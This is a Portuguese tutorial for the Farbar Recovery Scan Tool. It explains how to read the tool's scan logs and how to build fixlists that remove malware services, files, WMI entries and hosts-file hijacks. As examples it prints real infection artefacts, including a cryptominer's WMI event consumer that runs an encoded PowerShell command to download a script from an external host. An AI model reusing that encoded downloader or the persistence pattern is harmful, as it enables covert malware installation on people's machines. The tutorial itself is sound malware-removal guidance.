EstadoDeExecução TipoDeinicio NomeDoServiço; ImagePath ou ServiceDll [Tamanho DataDeCriação] (NomeAssinatura -> NomeEmpresa) [verificação de assinatura]

Estado de Execução - a letra ao lado do número o Estado de Execução:

 

R=Running (Em execução)

S=Stopped (Parado)

U=Undetermined (Indeterminado)

Os números pertencentes ao "Tipo de Inicio" (StartType), são:

0=Boot (Controlador de dispositivo iniciado no carregamento do sistema)
1=System (Controlador de dispositivo. O serviço é um controlador iniciado pela função IoInitSystem
2=Auto (Automático)
3=Demand (Manual)
4=Disabled (Desativado)
5=Assigned (Atribuído por FRST quando não pode ler o tipo de ínicio)

Sempre que veja [X] no final da linha listada, indica que o FRST não conseguiu encontrar os arquivos associados com o Serviço ou Driver correspondente e listou em seu lugar a ImagePath ou ServiceDll como está no Registro.

Os serviços Microsoft predeterminados que apontam a arquivos não assinados, requerem uma correção.

Exemplo:

==================== Serviços (Whitelisted) =================

R2 DcomLaunch; C:\Windows\system32\rpcss.dll [512512 2010-11-20] (Microsoft Corporation) [Arquivo não assinado]
R2 RpcSs; C:\Windows\system32\rpcss.dll [512512 2010-11-20] (Microsoft Corporation) [Arquivo não assinado]

Neste caso, o arquivo deve ser substituído com uma cópia legítima do arquivo original. Para isso, utilize o comando Replace:.

Para remover um serviço ou driver malicioso, copie e cole a linha para o fixlist. Qualquer arquivo associado deverá ser incluído separadamente.
Exemplo:
 

 

R1 94BE3917F6DF; C:\Windows\94BE3917F6DF.sys [619880 2019-03-07] (韵羽健康管理咨询（上海）有限公司 -> VxDriver) <==== ATENÇÃO
C:\Windows\94BE3917F6DF.sys

A ferramenta irá encerrar qualquer serviço incluído no fixlist e irá remover a chave do serviço.

Nota: FRST informará o sucesso ou a falha em parar o serviço em execução. Independentemente se o serviço é parado ou não, FRST tentará eliminar o serviço. Quando um serviço em execução é eliminado, FRST informará o usuário acerca de como completar a correção e a necessidade de reiniciar o sistema. Então, FRST irá reiniciar o sistema. Uma linha no final do arquivo Fixlog indicará a necessidade de reiniciar o sistema. Se o serviço não estiver em execução, FRST irá eliminá-lo sem forçar um reinicio.

Existe uma exceção quando um serviço será reparado em vez de eliminado. Nos casos em que o Themes tenha sido sequestrado pelo malware, verá algo como:

S2 Themes; C:\Windows\system32\themeservice.dll [44544 2009-07-14] (Microsoft Windows -> Microsoft Corporation) [DependOnService: iThemes5] <==== ATENÇÃO

Quando a entrada é incluída no fixlist, será restaurada para o seu estado predeterminado.

A seguinte linha não deve ser incluida no fixlist:

"NomeServiço" => o serviço foi desbloqueado. <==== ATENÇÃO

A mensagem indica que FRST detetou permissões danificadas e automaticamente corrigiu-as durante a análise. Um novo relatório (log) deve ser efetuado para se verificar o resultado. Se necessário, inclua a linha de serviço standard no fixlist.


NetSvcs

Cada uma das entradas NetSvc é listada em uma linha como esta:
 

NETSVCx32: HpSvc -> C:\Program Files (x86)\LuDaShi\lpi\HpSvc.dll ()

NETSVCx32: WpSvc -> não caminho do arquivo

Nota: Incluir uma entrada NetSvc apenas remove o valor associado do Registro. O serviço associado (se presente debaixo do setor Serviços) deve ser incluido para ser eliminado em separado.

Exemplo:
Para eliminar o valor Netsvc , o serviço associado no regist e o arquivo DLL associado, o script completo deverá se parecer a isto:
 

S2 HpSvc; C:\Program Files (x86)\LuDaShi\lpi\HpSvc.dll [239016 2016-07-21] (Qihoo 360 Software (Beijing) Company Limited -> ) <==== ATENÇÃO 
NETSVCx32: HpSvc -> C:\Program Files (x86)\LuDaShi\lpi\HpSvc.dll ()
C:\Program Files (x86)\LuDaShi

 

 
Um Mês (Criado/Modificado)

A análise "Created" informa a data e hora em que o arquivo ou pasta foi criado, seguido da data e hora da última modificação. A análise "Modified" informa a data e hora em que o arquivo ou pasta foi modificado, seguido da hora e data em que foi criado. O tamanho (número de bytes contidos) do arquivo também é mostrado. Uma pasta mostrará 00000000, já que a pasta em si não contém bytes.

Nota: Para evitar longos períodos de análise e resultados (log) excessivamente longos, a análise está limitada a algumas localizações padrão. Também, FRST apenas lista o nome das pastas, sem o seu conteúdo. Se desejar ver o conteúdo duma pasta, utilize a diretiva Folder:.

Nota: A confirmação de assinaturas digitais estão limitadas aos executáveis Microsoft (predeterminados na whitelist). Outras assinaturas digitais não são confirmadas. Para obter uma lista adicional de executáveis não assinados, utilize a análise opcional SigCheckExt:.

FRST adiciona notas a certas entradas do log:

C - Compressed (Comprimido)
D - Directory (Diretoria)
H - Hidden (Oculto)
L - Symbolic Link (Ligação Simbolica)
N - Normal (não tem outros atributos estabelecidos)
O - Offline (Desconetado)
R - Readonly (Apenas de Leitura)
S - System (Sistema)
T - Temporary (Temporário)
X - No scrub (Windows 8+) (Analisar e Verificar (windows 8+)

Para remover um arquivo ou pasta listado em um mês (criado/modificado), simplesmente copie e cole a linha inteira para o fixlist.

Linhas que apontam para ligações simbolicas (atributo L) são tratadas corretamente.

Exemplo:

2018-02-21 21:04 - 2018-02-21 21:04 - 000000000 ___DL C:\WINDOWS\system32\Ligação

Quando incluidas no fixlist, FRST irá eliminar apenas a ligação (link), deixando o objeto intato:
 

Ligação Simbólica: "C:\WINDOWS\system32\Ligação" => "C:\Windows\System32\Alvo" 
"C:\WINDOWS\system32\Ligação" => Ligação simbólica removido (a) com sucesso
C:\WINDOWS\system32\Ligação => foi movido com sucesso

De forma alternativa, também se pode utilizar a diretiva DeleteJunctionsInDirectory:.

Para corrigir outros arquivos/pastas, o seu caminho deve ser incluido no fixlist, sem utilizar aspas para os espaços:
 

C:\Windows\System32\Drivers\malware.sys

C:\Program Files (x86)\Malware

 

Se tiver muitos arquivos com nome similares e desejar eliminá-los em apenas um cript, pode usar o asterisco *.

Para isso, poderá colocar os arquivos da seguinte forma:

C:\Windows\Tasks\At1.job

C:\Windows\Tasks\At8.job

C:\Windows\Tasks\At13.job

C:\Windows\Tasks\At52.job

Ou apenas:

C:\Windows\Tasks\At*.job

Nota: Um caractere "?" é ignorado por questões de segurança, independentemente se é um caractere curinga ou de substituição para um caractere Unicode (veja a descrição "Unicode" em baixo da Introdução). Também, carateres curinga não são suportados para as pastas.


FLock

A seção lista os arquivos e pastas bloqueados nas diretorias standard.


FCheck

Esta seção está destinada a listar os arquivos maliciosos detetados, por exemplo DLL Hijacking. Como também arquivos zero byte (.exe e .dll) listados nas diretorias standard. Esta seção só é mostrada quando se encontram elementos como os descritos anteriormente.

Quando uma entrada é incluida no fixlist, o arquivo/pasta será movido.
 

KnowDLLs

Alguns itens nesta seção se estiverem em falta, modificados ou corrompidos, poderão causar problemas no arranque do sistema. Consequentemente, esta análise só aparece quando a ferramente é utilizada em modo RE (Ambiente de Recuperação).

Itens constam na whitelist, a menos que necessitem de atenção/verificação.

É necessária precaução ao lidar com os itens identificados nesta seção. Mesmo que um arquivo esteja em falta ou que pareça ter sido modificado de alguma maneira. Nestes casos, é recomendado recorrer a ajuda especializada para se assegurar que o arquivo é corretamente identificado e tratado da maneira adequada. Na maioria dos casos existe uma boa forma de substitui-lo que deve ser encontrado com a função de busca do FRST. Por favor, veja a seção Diretivas/Comandos para obter informação sobre substituir um arquivo e a seção Outras Análises opcionais para saber como efetuar uma busca.
 

SigCheck

FRST verifica um importante número de arquivos do sistema. Arquivos sem a assinatura digital correta ou arquivos em falta, serão reportados. A seção está incluída na whitelist fora do Ambiente de Recuperação, quando não haja problemas nos arquivos.

Os arquivos do sistema modificados, alertam para uma possível infeção por malware. Quando uma infeção é identificada, deve-se ter cuidado com as ações corretivas adotadas. Neste ponto, sugere-se que recorram á ajuda de um Especialista, em virtude de se for removido um arquivo do sistema, isso poderá fazer com que o computador não inicie.

Exemplo tirado de uma infeção Hijacker.DNS.Hosts:

C:\WINDOWS\system32\dnsapi.dll [2015-07-10 13:00] - [2015-07-10 13:00] - 0680256 _____ (Microsoft Corporation) 5BB42439197E4B3585EF0C4CC7411E4E 
C:\WINDOWS\SysWOW64\dnsapi.dll [2015-07-10 13:00] - [2015-07-10 13:00] - 0534064 _____ (Microsoft Corporation) 4F1AB9478DA2E252F36970BD4E2C643E

Neste caso o arquivo necessita de ser reposto por uma cópia legitima do mesmo. Deverá ser utilizado o comando Replace:.

Agumas versões de SmartService desativam o Modo de Recuperação. FRST reverte automaticamente a modificação BCD durante a análise.

BCD (recoveryenabled=No -> recoveryenabled=Yes) <==== restaurado com sucesso

A maneira mais segura de iniciar o sistema em Modo Seguro é utilizando o F8 (Windows 7 e anteriores) ou Ínicio Avançado ( Windows 11, Windows 10 e Windows 8). Em alguns casos, os usuário usam "Configuração do Sistema (msconfig)" para iniciar em Modo Seguro. No caso do Modo Seguro estar corrompido, o computador bloqueará e o sistema não irá conseguir ser iniciado em modo normal, já que está configurado para ser iniciado em Modo Seguro. Neste caso, visualizaremos o seguinte:

safeboot: Minimal ==> O sistema está configurado para inicializar no Modo de Segurança <===== ATENÇÃO

Para corrigir o problema, inclua a linha anterior no fixlist. FRST irá estabelecer o modo normal como predeterminado e o sistema sairá do ciclo em que se encontra.

Nota: Isto apenas se aplica ao Vista ou versões posteriores do Windows.


Associação

Nota: A "Associação" irá aparecer no resultado FRST.txt quando FRST é executado em Modo de Recuperação. Quando FRSST é executado fora do Modo de Recuperação, este seção irá aparecer no arquivo Addition.txt. A análise em Modo de Recuperação está limitada á associação de arquivo .exe.

Para listar a totalidade de arquivos .exe do computador, proceda da seguinte maneira:

HKLM\...\exefile\open\command: C:\Windows\svchost.com "%1" %* <===== ATENÇÃO

Tal como nas entradas de Registro, pode simplesmente copiar e colar as entradas relacionadas com o problema para o fixlist e elas serão restabelecidas. Não há necessidade de fazer correção do Registro.
 

Pontos de Restauração

Nota: Os "Pontos de Restauração" irão aparecer no resultado FRST.txt quando FRST é executado no Modo de Recuperação. Quando FRST for executado fora do Modo de Recuperação, esta seção irá aparecer no arquivo Addition.txt.

Os pontos de Restauração são listados.

Nota: Apenas no Windows XP se podem restaurar chaves utilizando FRST. Os pontos de Restauração no Vista e posteriores versões, devem ser restauradas em RE (Modo de Recuperação) utilizando as Opções de Recuperação do Sistema Windows.

Para corrigir, inclua a linha do ponto de Restauração que deseja dentro no script fixlist.

Exemplo de um sistema XP:
 

RP: -> 2010-10-26 19:51 - 024576 _restore{3216E3D3-FBC5-40AC-B583-63C1B9EE2B6F}\RP83

RP: -> 2010-10-24 13:57 - 024576 _restore{3216E3D3-FBC5-40AC-B583-63C1B9EE2B6F}\RP82

RP: -> 2010-10-21 20:02 - 024576 _restore{3216E3D3-FBC5-40AC-B583-63C1B9EE2B6F}\RP81

Para restaurar chaves deste o Ponto de Restauração 82 (data 2010-10-24) a linha deverá ser copiada e colada no fixlist da seguinte forma:

RP: -> 2010-10-24 13:57 - 024576 _restore{3216E3D3-FBC5-40AC-B583-63C1B9EE2B6F}\RP82

 Informação da Memória

Nota: A "Informação da Memória" irá aparecer no resultado FRST.txt quando FRST for executado em Modo de Recuperação. Quando FRST for executado fora do Modo de Recuperação, a seção irá aparecer no arquivo Addition.txt e irá conter mais informação (BIOS, Placa-Mãe, Processador).

Mostra a quantidade de RAM (Memória de Acesso aleatório) instalada no computador, assim como a memória física disponível e a percentagem da memória livre. Por vezes, isto pode ajudar a entender os sintomas do computador. Por exemplo, o número mostrado pode não refletir o que o usuário acreditar ter ao nível de hardware. A memória RAM indicada podería ser inferior á que realmente está instalada no computador. Isto pode acontecer quando o computador não consegue aceder á totalidade da memória RAM. As causas possíveis incluem RAM defeituosa, um problema no slot da Motherboard ou algo impedindo que a BIOS a reconheça (exemplo: a BIOS necessita de ser atualizada). Também, para os sistemas 32 bits com mais de 4GB de ram instalada, a capacidade máxima de ram mostrada será apenas de 4GB. Isto é uma limitação das aplicações de 32 bits.

Memória virtual e memória virtual disponível também são listadas.
 
 
Unidades/Discos & Tabela de Partição

Nota: As seção "Unidades/Discos [Drives]" e "MBR & Tabela de Partição" aparece no resultado FRST.txt quando FRST é executado no Modo de Recuperação. Quando FRST é executado fora do Modo de Recuperação, a seção irá aparecer no arquivo Addition.txt.

Enumera as unidades fixas e removíveis conetadas ao computador no momento da análise. Os volumes não montados são identificados pelo caminho GUID de volume.

Drive c: (OS) (Fixed) (Total:223.02 GB) (Free:173.59 GB) (Model: Force MP500) NTFS
Drive f: (Flash drive) (Removable) (Total:1.91 GB) (Free:1.88 GB) FAT32 
Drive g: (Recovery) (Fixed) (Total:0.44 GB) (Free:0.08 GB) (Model: Force MP500) NTFS
Drive x: (Boot) (Fixed) (Total:0.5 GB) (Free:0.49 GB) NTFS 

\\?\Volume{74a80af8-ff89-444b-a7a3-09db3d90fd32}\ () (Fixed) (Total:0.09 GB) (Free:0.07 GB) FAT32

Esquema de partição baseado em UEFI/GPT: apenas é detetado a disposição GPT básica e não uma completa lista de partições disponíveis.
 

Disk: 0 (Protective MBR) (Size: 223.6 GB) (Disk ID: 00000000)

Partition: GPT.

Esquema de partição baseado em BIOS/MBR: o código MBR e as entradas de partição, são detetadas. Contudo as partições lógicas em partições estendidas não são listadas.
 

Disk: 0 (MBR Code: Windows 7/8/10) (Size: 465.8 GB) (Disk ID: 73FD73FD)

Partition 1: (Active) - (Size=39.1 GB) - (Type=07 NTFS)

Partition 2: (Not Active) - (Size=426.7 GB) - (Type=0F Extended)

Quando aparece uma sobre algo errado com o MBR, o mais apropriado é fazer uma verificação do MBR. Para fazer isto é necessário obter um despejo (dump) do MBR. Execute o fix seguinte no FRST em qualquer modo:

SaveMbr: drive=0 (ou número de drive apropriado)

Após fazer isso, haverá um arquivo MBRDUMP.txt guardado no mesmo local onde o FRST/FRST64 está.

Nota: Pode-se obter um MBR dump tanto em modo Normal ou em RE, algumas infeções de MBR podem falsificar o MBR quando o Windows é iniciado. Como consequência, recomenda-se fazer este processo em modo RE.
 
 
LastRegBack

FRST analisa o sistema e lista a última cópia de segurança (backup) feita pelo sistema. O backup do Registro, contém uma cópia de segurança de todas as chaves. Esta é diferente do backup da LKGC (Last Known Good Configuration = Última Configuração Válida Conhecida) do ControlSet.

Existem várias razões para querer usar este backup como solução para o problema, mas uma das mais comuns é quando ocorrem perdas ou danos de dados.

Possivelmente irá ver isto no cabeçalho do FRST:

ATENÇÃO: Não foi possível carregar as chaves dos sistema.

Para corrigir isto, inclua a seguinte linha no fixlist:

LastRegBack: >>data<< >>hora<<

Exemplo:

LastRegBack: 2013-07-02 15:09

 

 

[Lusitano]

Análise Adicional (Addition.txt)

Cabeçalho

O cabeçalho da análise adicional, contém um breve resumo de informação útil:
    
A seguir, um exemplo de cabeçalho:

Resultado da Análise Adicional de Farbar Recovery Scan Tool (x64) Versão: 20-10-2017 
Executado por User (21-10-2017 14:16:13) 
Executando a partir de C:\Users\User\Desktop 
Windows 10 Pro Version 1709 16299.19 (X64) (2017-10-17 23:06:22) 
Modo da Inicialização: Normal

Primeira linha: Informa se foi executada a versão 32-bits ou 64-bits. Também identifica a versão do FRST.
Segunda linha: Mostra que usuário executou a ferramenta e a data e hora.
Terceira linha: Informa o local de onde foi executado o FRST.
Quarta linha: Mostra a versão do Windows e a data de instalação.
Quinta linha: Mostra em que modo a análise foi executada.


Contas

Lista as contas padrão existentes no sistema, no formato seguinte: nome da conta local (identificadores de segurança - privilégios - Ativada/Desativada) => caminho de perfil. Os nomes das contas Microsoft não são mostrados.

Entradas maliciosas podem ser incluídas para serem removidas.
Exemplo:

WgaUtilAcc (S-1-5-21-1858304819-142153404-3944803098-1002 - Administrator - Enabled) => removido (a) com sucesso

Nota: Apenas será eliminada a conta do usuário. A eventual pasta na diretoria de Users (Usuários) deverá ser listada em separado para ser removida.
 

Centro de Segurança

É possível que a lista contenha resto de programas de segurança desinstalados. Nestes casos, as linhas podem ser incluídas no fixlist para serem removidas.
Alguns programas de segurança impedem a remoção da entrada se não estão completamente desinstalados. Nesses casos, em vez de encontrar a confirmação da remoção no Fixlog, irá ver o seguinte:

Entrada do Centro de Segurança => O item é protegido. Certifique-se de desinstalar o programa e remover os seus serviços.

 Programas Instalados

Lista os programas clássicos e os pacotes Windows 11/10/8.

Os pacotes Microsoft pré-instalados limpos, constam da whitelist. Os pacotes com publicidade da Microsoft e de outros editores, são etiquetados com [MS Ad].

Exemplo:

App Radio -> C:\Program Files\WindowsApps\34628NielsCup.AppRadio_9.1.40.6_x64__kz2v1f325crd8 [2019-06-04] (Niels Cup) [MS Ad]

As entradas Ativadas ou Desativadas visíveis debaixo do Ínicio (startup) são etiquetadas com [Startup Task].
 
FRST contém uma base de dados integrada para poder identificar e marcar um grande número de adware/PUP.

Exemplo:

Zip Opener Packages (HKU\S-1-5-21-3240431825-2694390405-104744025-1000\...\Zip Opener Packages) (Version: - ) <==== ATENÇÃO

É altamente recomendado desinstalar os programas identificados desta maneira, antes de executar uma ferramenta automática para remover adware. O desinstalador de adware remove a maioria das entradas e reverte as mudanças de configuração.

Programas do Ambiente de Trabalho que não são mostradas em "Programas e Caraterísticas) são listadas com uma etiqueta "Hidden", conforme exemplo:

Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.34.11 - Google LLC) Hidden

Existe um grande número de programas legítimos que estão ocultos por uma boa razão. No caso de programas maliciosos, as entradas podem ser incluídas no fixlist.
 
Nota: Este fix apenas torna o programa visível e não o desinstala. O programa deve ser desinstalado pelo usuário.
 

CLSID Personalizado

Lista as classes personalizadas nas chaves do Registro, ShellServiceObjectDelayLoad, ShellServiceObjects, ShellExecuteHooks, ShellIconOverlayIdentifiers, ContextMenuHandlers e FolderExtensions.

Exemplo:

ContextMenuHandlers1: [SystemHelper] -> {851aab5c-2010-4157-9c5d-a28dfa7b2660} => C:\Windows\ExplorerPlug.dll [2018-03-03] (Диспетчер источников) [Arquivo não assinado]

Para corrigir entradas maliciosas, adicione-as ao fixlist e FRST irá remover as chaves do Registro. Os arquivos/pastas deverão ser listadas em separado para serem removidas.

Nota: O software legítimo de terceiros pode criar CLSID personalizados, por isso deverá ter atenção para não remover entradas legítimas.
 
 
Codecs

Quando são incluídos no fixlist, as entradas padrão modificadas serão restauradas e as entradas personalizadas serão eliminadas do Registro. Os arquivos associados devem ser listados em separado para serem movidos.


 Atalhos & WMI

Lista os atalhos sequestrados ou suspeitos localizados na pasta do usuário a partir da qual está conectado e na pasta raiz de C:\ProgramData\Microsoft\Windows\Start Menu\Programs e C:\Users\Public\Desktop.

As entradas podem ser incluídas no fixlist para serem corrigidas - veja Shortcut.txt abaixo em Outras Análises Opcionais.

Nota: A análise Shortcut.txt contém todos os atalhos de todos os usuários, equanto que o relatório Addition.txt contém apenas os atalhos sequestrados/suspeitos encontrados no perfil de usuário com sessão iniciada.
 
FRST analisa os espaços dos nomes WMI em busca de Registros que não são standard. Infeções conhecidas são sinalizadas.

Exemplo tirado de uma infeção Cryptocurrency Miner:

WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"****youmm4\"",Filter="__EventFilter.Name=\"****youmm3\":: <==== ATENÇÃO
WMI:subscription\__EventFilter->****youmm3::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'] <==== ATENÇÃO
WMI:subscription\CommandLineEventConsumer->****youmm4::[CommandLineTemplate => cmd /c powershell.exe -nop -enc "JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB (a entrada de dados tem mais de 665 carateres).] <==== ATENÇÃO

Para eliminar o malware, inclua as linhas no fixlist.

Nota: Software OEM (exemplo: Dell) pode criar Registros personalizados. Pesquise/Estude as entradas desconhecidas para saber se são ou não legítimas.
 
 
Módulos Carregados

Módulos carregados são filtrados através da whitelist, baseando-se na presença de assinatura digital válida. Em consequência, os itens que não passem a validação da assinatura digital, serão listados.


 Alternate Data Streams [Sequências de Dados Alternativos]

FRST lista as Alternate Data Streams [Sequências de Dados Alternativos] da seguinte forma:

==================== Alternate Data Streams (whitelisted) ========== 
AlternateDataStreams: C:\Windows\System32\arquivolegítimo:malware.exe [134] 
AlternateDataStreams: C:\malware:malware.exe [134]

O tamanho da ADS (número de bytes contidos) é mostrado entre colchetes (parêntese reto) no final do caminho.

Se a ADS está em um arquivo/pasta legítimo, o fix a copiar e colar deverá incluir a linha inteira mostrada para dentro do fixlist.

Exemplo:

AlternateDataStreams: C:\Windows\System32\arquivolegítimo:malware.exe [134]

Se está em um arquivo/pasta, o fix deverá ser:

C:\malware

No primeiro caso, FRST irá remover apenas o ADS do arquivo/pasta.

No último caso, o arquivo/pasta será eliminado.


 Modo Seguro

Se falta alguma das chaves principais (SafeBoot, SafeBoot\Minimal e SafeBoot\Network) será reportado. Nesses casos, deverão ser manualmente corrigidas.

Se foi criada uma entrada de malware, ela poderá ser incluída no fixlist para ser eliminada.


 Associação - Consulte a seção Associação mostrada anteriormente neste tutorial.

Lista as associações de arquivos .bat, .cmd, .com, .exe, .reg e .scr.

Quando qualquer entrada predeterminada modificada é incluída no fixlist, a entrada predeterminada será restaurada. Qualquer chave de usuário que seja incluída no fixlist, será eliminada.


 Internet Explorer
 
O título da seção contém a versão do Internet Explorer no Windows 7 e versões anteriores.
 
Dependendo do tipo de objeto, FRST irá eliminar os itens do Registro ou restaurar para o seu estado predeterminado.

Os arquivos/pastas associados, deverão ser listados em separado se necessitarem de ser movidos.


 Conteúdo Hosts - Consulte a seção Hosts mostrada anteriormente neste tutorial.

Proporciona mais detalhes relacionados com o arquivo Hosts: propriedades do arquivo Hosts e primeiras 30 entradas ativas. As entradas inativas (comentadas) são ocultadas.

Exemplo:

2009-07-14 04:34 - 2016-04-13 15:39 - 00001626 _____ C:\Windows\system32\Drivers\etc\hosts 

107.178.255.88 www.google-analytics.com 
107.178.255.88 www.statcounter.com 
107.178.255.88 statcounter.com 
107.178.255.88 ssl.google-analytics.com 
107.178.255.88 partner.googleadservices.com 
107.178.255.88 google-analytics.com 
107.178.248.130 static.doubleclick.net 
107.178.247.130 connect.facebook.net

Estas linhas não podem ser processadas individualmente.
- Para restabelecer o arquivo standard, utilize a diretiva Hosts: ou inclua a linha alertada no relatório FRST.txt.
- No caso de um arquivo hosts.ics personalizado, inclua o caminho do arquivo no fixlist.


 Outras Áreas

Há alguns outros itens analisados pela FRST que não são cobertos por títulos. Não existe uma correção automática neste momento.

Path - A entrada é visível debaixo das seguintes condições: falta a cadeia predeterminada (default string), um posicionamento incorreto da cadeia predeterminada (default string), nenhum valor de path.

Exemplo:

HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path ->

Para corrigir a variável Path, pode realizar uma correção manual ou utilzando o Editor de Variáveis de Ambiente.

Nota: O Path (caminho) corrompido pode afetar os processos de cmd: e Powershell: utilizando um caminho alternativo para as ferramentas da consola.
 
 
 
Wallpaper (Fundo do Ambiente de Trabalho) - Diversas variantes de crypto-malware utilizam este parâmetro para mostrar uma imagem de resgate (ransomsware).

Exemplo:

O caminho normal pode ser assim:

HKU\S-1-5-21-2507207478-166344414-3466567977-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\User\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg

Caminho e arquivo inválidos podem ser semelhantes a este:
 

HKU\S-1-5-21-746137067-261478967-682003330-1003\Control Panel\Desktop\\Wallpaper -> C:\Documents and Settings\User\My Documents\!Decrypt-All-Files-scqwxua.bmp

No caso de entradas de malware, o caminho do arquivo pode ser incluído no fix, juntamente com qualquer arquivo relacionado, encontrado no FRST.txt.

Nota: Ao eliminar o wallpaper do malware, irá remover também o fundo do Ambiente de trabalho.

O usuário deve restabelecer o fundo de Ambiente de Trabalho.

No Windows XP:
Para estabelecer o fundo de ambiente de trabalho, clique-direito sobre qualquer área do ambiente de trabalho, selecionar Propriedades, clicar no separador Ambiente de Trabalho, selecionar uma imagem, clicar "Aplicar" e "Aceitar".

No Windows Vista e posteriores:
Para estabelecer o fundo de ambiente de trabalho, clique-direito sobre qualquer área do ambiente de trabalho, selecionar Personalizar, clicar no separador Fundo do Ambiente de Trabalho, selecionar uma das imagem e clicar "Salvar Alterações".


 DNS Servers (Servidores DNS) - DNS atualmente em uso. Isto é muito útil para detetar sequestros de DNS/Router.

Exemplo:

DNS Servers: 213.46.228.196 - 62.179.104.196

Pesquise pela direção em WhoisLookup para obter informação sobre se o servidor é ou não legítimo.
 
Nota: A listagem dos servidores não são lidas do Registro, portanto o sistema deverá estar conetato a internet.

Quando FRST é executado em Modo Seguro ou o sistema não está conetado a internet, você irá ver o seguinte:

DNS Servers: "O Suporte não está conectado à internet."

 

UAC (Controlo de Contas de Usuário)

Ativado (configuração padrão):

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)

Desativado:

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 0)

Isto pode ser causado por o usuário ter desativado o UAC (Controlo de Contas) ou como efeito secundário de atividade maliciosa. A menos que seja óbvio que a causa provenha de malware, é melhor primeiro questionar o usuário antes de fazer qualquer correção.

 
SmartScreen (Windows 8+)

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: Dados do Valor)

Valores suportado por Windows: Block | Warn | Off (Windows 10 Versão 1703+) ou RequireAdmin | Prompt | Off (sistemas antigos).
 
Valores em falta (configuração padrão no Windows 10 versão 1703+) ou sem valor, serão reportados da seguinte forma:

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: )

 Provedores de Serviço de Telefonia

As entradas padrão e algumas entradas legítimas de terceiros constam da whitelist. A linha apenas é visível se uma entrada padrão for detetada.

Exemplo:

HKLM\software\microsoft\Windows\CurrentVersion\Telephony\Providers => ProviderFileName3 -> C:\Windows\system32\desconhecido.tsp (Editor)

Entradas maliciosas ou danificadas, requerem uma correção manual no Registro. Elimine as entradas ProviderIDx e ProviderFileNamex correspondentes e renumere as restantes entradas em consequência.
 

 

BITS

Lista os trabalhos BITS, utilizando uma notificação de linha de comendos. Veja: Atacantes usam o Serviço de Transferência Inteligente em Segundo Plano bits (BITS).

BITS: {Trabalho ID} - (Trabalho Nome) -> [NotifyCmdLine: Comando] [files:Caminho Remoto -> Caminho Local]

 

Para remover todos os trabalhos BITS, utilize a diretiva EmptyTemp:.

 

 

Firewall do Windows

Exemplo:

Windows Firewall está habilitado.

FRST informa se a firewall do Windows está ou não ativa. Quando FRST é executado em Modo Seguro ou quando existe algo errado com o sistema, não será mostrada nenhuma entrada relacionada com a Firewall.

 
Network Binding (Windows 8+)

Lista os componentes não padrão conetados aos adaptadores de rede. Compare os resultados com os da seção Drivers (Controladores) para encontrar um elemento coincidente.

Exemplo:

Network Binding: 
============= 
Ethernet: COMODO Internet Security Firewall Driver -> inspect (enabled) 
Wi-Fi: COMODO Internet Security Firewall Driver -> inspect (enabled)

 

R1 inspect; C:\Windows\system32\DRIVERS\inspect.sys [129208 2019-10-16] (Comodo Security Solutions, Inc. -> COMODO)

No caso de desinstalação de um programa padrão falhar a eliminação dos itens, a ligação de rede deverá ser eliminada antes de processar o controlador (driver). Siga os passos descritos na Base de Conhecimento ESET.

Nota: Certifique-se que elimina a ligação de rede antes de incluir o serviço (driver) no fixlist. Caso contrário, eliminar o serviço (driver) irá quebrar a conexão de rede.
 

MSCONFIG/TASK MANAGER itens desativados

O resultado da análise é útil quando o usuário utilizou o MSCONFIG ou o Gerenciador de Tarefas para desativar entradas de malware em vez de as ter eliminado. Ou, se desativou demasiados e alguns serviços ou aplicações essenciais não são capazes de ser executados devidamente.

Exemplo:
MSCONFIG no Windows 7 e versões anteriores:
 

MSCONFIG\Services: Quotenamron => 2
MSCONFIG\startupfolder: C:^Users^User^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^339bc1.lnk => C:\Windows\pss\339bc1.lnk.Startup 
MSCONFIG\startupreg: AdAnti => C:\Program Files (x86)\AdAnti\AdAnti.exe /S

Estes dados são interpretados da seguinte forma:

 

Serviços Desativados:

MSCONFIG\Services: NomeServiço => Original start tipo

Itens desativados na pasta de Ínicio (Startup):

MSCONFIG\startupfolder: Caminho Original (substituído "\" por "^" pelo Windows) => Caminho para o backup feito pelo Windows.

Entradas desativadas que são executadas ao inciar o sistema:

MSCONFIG\startupreg: NomeValor => Caminho para o arquivo.

 MSCONFIG no Windows 8 e Versões mais recentes

HKLM\...\StartupApproved\Run32: => "win_en_77" 
HKU\S-1-5-21-2411900937-544243709-2355068264-1001\...\StartupApproved\StartupFolder: => "SmartWeb.lnk" 
HKU\S-1-5-21-2411900937-544243709-2355068264-1001\...\StartupApproved\Run: => "svchost0"

Nota: Windows 8 e versões mais recentes, utilizam o msconfig apenas para os serviços. Os itens de inicialização são movidos para o Gerenciador de Tarefas, que armazena os itens desativados em chaves diferentes. Um item não ausente desativado é listado duas vezes: no FRST.txt (Seção do Registro) e no Addition.txt.

Entradas podem ser incluídas no fixlist para serem eliminadas. FRST irá realizar as seguintes ações:

• No caso de serviços desativado, irá eliminar a chave criada pelo MSCONFIG e eliminar o próprio serviço.
• No caso de itens Run que se executam no iniciar, irá eliminar a chave/valor criado pelo MSCONFIG/TASK MANAGER. A própria entrada Run em si que se executa nos sistemas mais recentes, também será eliminada.
